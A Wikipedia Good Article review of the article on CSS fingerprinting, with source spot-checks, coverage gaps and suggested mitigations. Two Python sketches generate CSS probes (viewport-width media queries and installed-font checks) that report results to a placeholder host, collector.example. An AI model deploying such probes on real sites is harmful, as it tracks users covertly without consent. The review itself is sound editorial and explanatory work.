
Talk:CSS fingerprinting/GA1

From Wikipedia, the free encyclopedia

GA review



Nominator: Sohom Datta (talk · contribs) 23:36, 18 January 2026 (UTC)

Reviewer: Esculenta (talk · contribs) 16:29, 21 February 2026 (UTC)


Hi, I'll review this article. Will have comments here in the next few days. Esculenta (talk) 16:29, 21 February 2026 (UTC)

Spot checks

  • Unsupported/overbroad claim ("user-generated content"): The sentence asserting that style sheets are "typically allowed in user-generated content" (used to argue "larger reach") does not seem to be stated in the Trampert et al. paper, which focuses on HTML emails and other contexts, not UGC in general.
  • Overstrong conclusion ("larger reach"): The source supports that CSS-based techniques can work where JavaScript is disabled (including email contexts), but the draft's "larger reach" wording reads like a sweeping conclusion. Consider attributing/qualifying it (e.g., "can apply in contexts where JavaScript is disabled") rather than stating it as a settled fact.
  • Technique example slightly misaligned: "font retrieval on a media query" is not how the source frames it; it discusses conditional group rules and @font-face multi-source behaviour.
  • Misattributed mechanism in font section: The sentence about applying 'font-family' directly and measuring element size to infer installed fonts/apps reads like it is supported by the font-metrics literature already cited, but doesn't cleanly match Trampert et al.'s described method (container queries / computed-size comparisons).
  • calc() wording overstates/frames incorrectly: The source supports that 'calc()' evaluation differences can help distinguish architectures/platform-browser combinations, but "reveal the instruction set and precision of the underlying operating system" is sloppy/overstated. Better to frame it as differences in browser/engine/platform evaluation that can help infer architecture (e.g., ARM vs x86-64) and browser/OS pairs.
  • Uniqueness claim needs qualification: "uniquely identify users based on their installed extensions" is plausible, but is stronger than what Trampert et al. explicitly claims/quantifies in the cited discussion. Safer wording would be "can contribute to a unique fingerprint" unless another source is cited for uniqueness.
  • Date error: "Another font-based attack proposed by Heiderich et al. in 2017": the paper is from 2012, not 2017.
  • "…loading specially prepared fonts where the glyphs for a set of letters had been swapped out for zero-width glyphs." This is imprecise. Heiderich et al. describe a "one font per character" approach: each font makes one chosen character render with a distinctive width, while other characters in that font effectively render at zero width. The article should reflect that framing rather than implying a glyph-swap scheme. More importantly, the exfiltration doesn't use "height/width queries" (which implies Media Queries); it uses a layout side-channel. The attack forces a line-break or scrollbar to appear based on the character's width, then uses CSS selectors (like ::-webkit-scrollbar) to trigger a background-image request. I suggest rewriting this to distinguish between declarative queries (like @media) and layout-driven side-channels.
  • "Using a series of CSS animations and height/width queries, the attacker can infer the heights of the characters … making it possible to leak the data … character by character." Source (pp. 764–766): Uses a CSS animation that shrinks a container and relies on line breaks + scrollbar appearance, then a side channel via WebKit scrollbar state selectors/background loads. Problem: The draft's "height/width queries" and "infer the heights of the characters" framing doesn’t match what the paper describes (scrollbar/line-break/side-channel behaviour). "Character by character" is loosely compatible with the "one font per character" approach, but the explanation given is off.
  • "An attacker can craft code to register a CSS selector that gets activated only when a user types a specific string into an input field … [and] … could also be used as a keylogger …" Source (p. 763): The paper does say they "implemented a scriptless keylogger … capture keystrokes … even when JavaScript is disabled", and elsewhere notes SVG can "intercept … keystrokes … without using scripting technologies." Problem: The draft's detailed mechanism (CSS selectors triggering on typed strings + background-image exfiltration) is not supported by the cited page. What's supported is the existence of a scriptless keylogger concept/PoC and the broader point that scriptless techniques can capture keystrokes without JS; the "how" in the draft needs either a different source or rewriting to match what Heiderich et al. actually say.
  • Page numbers: All info sourced to Lin, Araujo, Taylor and Jang (2023) is broadly supported, but the page numbers seem to be off in some instances. For example, "Media queries are a set of CSS directives that allow a website to query different properties about a screen such as the height, width or whether the user is in a printing interface. Media queries allow websites to conditionally apply CSS styles if a particular set of conditions are met." is cited to Lin 2023 p=991, but the relevant explanation seems to be on p. 989. Another example: "Other features available to CSS include whether or not JavaScript is enabled and scrollbar settings, particularly on macOS." is cited to Lin 2023 p=993,994, but the info seems to be on other pages: p. 990 has "We detect if JavaScript is disabled by wrapping an HTML element inside the <noscript> tag…", and on p. 994 "Scrollbar Settings (OS X)" appears as a fingerprinting attribute in their evaluation table. A third: "...media queries… background-image… makes a request to a remote URL… with the choice of image conveying information…" is cited to Lin 2023 p=992,1002, but the background-image callback mechanism is discussed on p. 989 of the paper, not p. 992 or p. 1002.
  • Extension-detection paragraph blends methods and overstates uniqueness: With Trampert et al. (2025) + Laperdrix et al. (2021) cited, the general idea (extensions inject styles/DOM; this can be detected and used for fingerprinting) and the Wikiwand example are covered, but the paragraph reads like one coherent workflow ("Wikiwand → CSS container queries → compare against a fingerprint database → uniquely identify users") that neither source presents as such. Laperdrix's detection relies on script reading computed style effects, while Trampert demonstrates CSS-only/container-query probing; and "uniquely identify users" is phrased too absolutely — better framed as "can contribute to uniquely identifying users / increase identifiability."
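
To make the "declarative query" side of that distinction concrete, here is a minimal sketch of the media-query callback mechanism quoted above (a conditional background-image request whose URL conveys the matched condition). It is written in Python only so that the generated CSS can be checked; the collector.example endpoint, the #probe selector and the width buckets are all hypothetical and are not taken from Lin et al. or any other cited paper. The layout-driven side channel in Heiderich et al. works differently and is not shown here.

```python
def media_query_probe_css(breakpoints, endpoint="https://collector.example/px"):
    """Build CSS in which each viewport-width bucket fetches a distinct URL.

    `endpoint` and the `#probe` selector are hypothetical placeholders.
    """
    bounds = sorted(breakpoints)
    rules = []
    # Pair consecutive breakpoints into non-overlapping [low, high - 1] buckets.
    for low, high in zip(bounds, bounds[1:]):
        rules.append(
            f"@media (min-width: {low}px) and (max-width: {high - 1}px) {{\n"
            f"  #probe {{ background-image: url('{endpoint}?w={low}-{high - 1}'); }}\n"
            f"}}"
        )
    return "\n".join(rules)


css = media_query_probe_css([0, 600, 1200, 1920])
print(css)
```

Only the rule whose condition matches applies, so only that one URL is requested, and the server learns the width bucket from which request arrives. No script runs on the client.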


  • Assessment of WIAGA criterion 1a+b. Overall: readable for a technically minded reader, but it's not yet consistently clear for a broad audience. A few sentences are clunky, and some jargon is dropped in without a plain-English gloss.
  • Jargon density without quick glosses: terms like stateless, exfiltration, conditional networking request, container queries, image-set, @supports, and calc() are used as if the reader already knows them. GA doesn't require hand-holding, but the article should define/briefly explain each the first time it matters (one short clause is enough).
  • Awkward/ambiguous phrasing in the lead: "It leverages differences across browsers, or CSS queries …" reads like two different things are being compared. You want something more direct: "It uses CSS features (such as media queries) and differences between browser implementations…"
  • The lead currently does not clearly summarise the structure of the article (but this is best saved until last pending the possible addition of further info).
  • Assessment of WIAGA criterion 3a ("broad in its coverage"). I think some aspects are thin or missing:
  • The article presents techniques as a flat catalogue without any chronological development. The :visited history-sniffing attack and its patching (pre-2010) is arguably an important precursor that contextualises the shift to the techniques described here.
  • Real-world prevalence is completely absent. The article currently has zero sourced statements about whether any of these techniques have been observed in the wild, how widespread CSS-based tracking actually is, or whether these remain primarily academic demonstrations.
  • Legal/regulatory dimension. There's no mention of how CSS fingerprinting intersects with privacy regulations (GDPR, ePrivacy Directive, etc.), which treat fingerprinting as equivalent to cookies for consent purposes. Even a brief mention would help breadth.
  • The Example section is very narrow. It only demonstrates the simplest technique (media-query width detection), which doesn't demonstrate what makes CSS fingerprinting distinctive or concerning. The more novel techniques (font probing, calc() architecture detection, extension detection) go unillustrated.
  • Defences/mitigations and current status. The article mentions "defences limit JavaScript" as motivation, but it doesn't cover what defenders actually do about CSS-based attacks (browser changes, client hardening, email sanitisation, CSP-like restrictions, limiting external loads, blocking conditional loads, disabling remote fonts/images in email, etc.). For a security/privacy technique, a short "Mitigations" section would help the breadth. This could cover things like:
  • Browser-level fixes: Mention how some browsers attempt to reduce font-based fingerprinting by limiting access to local fonts and/or standardising font-related measurements.
  • Email Client Sanitization: Many email clients reduce tracking risk by limiting or rewriting external resource loads (for example, proxying or blocking remote images/fonts by default) and constraining which CSS constructs are honoured in email rendering.
  • Content Security Policy (CSP): Discuss how img-src or font-src directives can prevent CSS from making unauthorized external requests.
  • The article reads like "these attacks exist", but not "how much this matters": are these mostly academic PoCs, seen in the wild, used by trackers, or primarily a risk in email contexts? Even two or three sourced sentences would round this out.
  • Definition boundary / relationship to neighbouring topics. It would help to distinguish CSS fingerprinting from (a) general browser fingerprinting, (b) "CSS exfiltration"/scriptless data theft, and (c) "style-based fingerprinting" (Lin et al.'s implicit styling fingerprints are related but not identical in framing). Right now the Techniques section drifts into scriptless exfiltration generally.
  • Practical Constraints: The article presents these attacks as highly effective, but lacks context on their "cost." Based on Takei et al. (2015) and later surveys, CSS-only fingerprinting often requires massive payloads (frequently >1MB of CSS) to probe for enough system variables to be useful. This makes the attack conspicuous in network logs and slows down page rendering, which limits its "in the wild" utility compared to JavaScript. Adding a sentence on the bandwidth-to-entropy trade-off would improve the article's balance.
  • Criterion 3b ("it stays focused on the topic"): I think the article blurs fingerprinting and exfiltration/keylogging. Extension detection and font presence are clearly fingerprinting. The keystroke/keylogger material is closer to "scriptless data exfiltration" than fingerprinting per se unless it is explicitly tied back ("these same CSS-only channels can also leak interaction data"). As written, it feels like a bit of a tangent.
  • Other sources: I had a look around for other sources that might be useful. These are not requirements for inclusion, but suggestions on how the current article info could be fleshed out.
  • This source explicitly treats CSS fingerprinting as giving more limited data than JavaScript-heavy methods, and summarises practical constraints such as scalability/bandwidth cost in Takei-style approaches (large CSS payloads per request) and brute-force font probing being visible in network traffic. It summarises the pre-2010 :visited history-sniffing issue, notes it was patched, and then frames the shift to later CSS-only approaches (Takei et al. 2015). That's a possible "how we got here" bridge that the current draft doesn't really have.
  • This article (same author) also recaps the pre-2010 :visited link-history leak, notes it was patched, then points to the later move to CSS-only fingerprinting via @media-driven URL fetches (Takei et al. 2015), which would help readers see how CSS-based approaches evolved. It explicitly frames CSS fingerprinting (Takei-style) as providing limited data unless combined with other passive signals (e.g., header attributes), and it gives concrete practicality limits: scalability/bandwidth cost (example: >1 MB CSS per request in a cited GitHub implementation) and the fact that font probing is brute-force and can be conspicuous in network traffic. Table I gives an at-a-glance evaluation of CSS fingerprinting (low uniqueness/entropy in their assessment) and a simple defence line ("limit or disable CSS fingerprinting through extensions or scripts"). Even if you keep it cautious/attributed ("one survey rates …"), it gives you a secondary-source foothold to cover defences, which is currently a gap.
  • This source might have a few useful bits to add:
  • It explicitly points out that "browser fingerprinting" is used two ways in the literature (browser identification vs user re-identification) and says their work uses the browser-identification meaning. That would help readers understand why some "CSS fingerprinting" papers look different from the scriptless-tracking framing.
  • It adds a technique family the current article doesn't cover well: CSS feature-support fingerprinting (Techniques): it describes fingerprinting based on supported CSS properties, selectors, and filters, including vendor-prefix differences across engines (their Table I) and examples like -moz- vs -webkit-.
  • It explains a common implementation approach: set CSS values on an element, then use JavaScript to inspect the element's style object and returned values (including cross-browser differences in how composite properties are serialised). This is a different branch of CSS fingerprinting than the "conditional URL request" side channel the article focuses on.
  • It provides an explicit set of 23 CSS properties and test values used for fingerprinting (Table IV).
  • It uses browser/CSS fingerprinting as part of a server-side session hijacking prevention framework (SHPF), i.e., a defensive/security motivation rather than tracking. That would broaden coverage without going off-topic.
  • One caveat for integration: their "CSS fingerprinting" implementation relies on JavaScript to read out support/values, so it should be presented as a different class of CSS fingerprinting from the scriptless/email attack line that's been built from Trampert et al.
  • Images: a lack of images is not surprising for a topic like this, but I suggest that a conceptual diagram (e.g. vector flowchart) of the CSS exfiltration loop would be valuable.
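
As a rough illustration of the bandwidth-to-entropy point raised under "Practical Constraints", the sketch below generates brute-force font probes in the @font-face multi-source style (local() first, remote url() as fallback) and measures how many bytes of CSS are spent per yes/no answer. It is an assumption-laden toy, not a reproduction of Takei et al. or of any cited implementation: the endpoint, the selectors and the font list are hypothetical, and it assumes a browser that honours local() and only fetches the fallback URL when the local font is missing.

```python
def font_probe_css(fonts, endpoint="https://collector.example/font"):
    """Build one @font-face probe per font name.

    `endpoint` and the `#p<i>` selectors are hypothetical placeholders.
    """
    rules = []
    for i, font in enumerate(fonts):
        family = f"probe-{i}"
        rules.append(
            # local() is tried first; the url() fallback is the observable signal.
            f"@font-face {{ font-family: '{family}'; "
            f"src: local('{font}'), url('{endpoint}?missing={i}'); }}\n"
            f"#p{i} {{ font-family: '{family}'; }}"
        )
    return "\n".join(rules)


def bytes_per_bit(fonts):
    """Return (payload bytes, upper bound on bits, bytes per bit)."""
    size = len(font_probe_css(fonts).encode("utf-8"))
    # Each installed/missing answer is binary, so it carries at most one bit.
    max_bits = len(fonts)
    return size, max_bits, size / max_bits


size, max_bits, ratio = bytes_per_bit(["Arial", "Calibri", "Segoe UI"])
print(f"{size} bytes of CSS for at most {max_bits} bits ({ratio:.0f} bytes per bit)")
```

The one-bit-per-probe figure is an upper bound. Fonts that nearly every device has, or nearly none has, contribute far less, which is why the payload grows much faster than the identifying information it yields.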

Ok, there's a bit to think about. Drop a ping when you're ready for me to take another look. Esculenta (talk) 17:44, 23 February 2026 (UTC)

No engagement with (or acknowledgment of) the review (despite nominator activity), so shutting this down. Esculenta (talk) 17:49, 2 March 2026 (UTC)

Hey, sorry, I was out on vacation last week and just came back yesterday. I was planning on working on it this week! Sorry about that. If you are okay with it, I'd still like to continue the review informally, even if I don't necessarily get a GA out of it! Sohom (talk) 18:06, 2 March 2026 (UTC)
I'm going to be avoiding anything GA-related for a while, so hopefully the comments will be of use for you to upgrade the article, and I wish you success with a future reviewer! Esculenta (talk) 18:12, 2 March 2026 (UTC)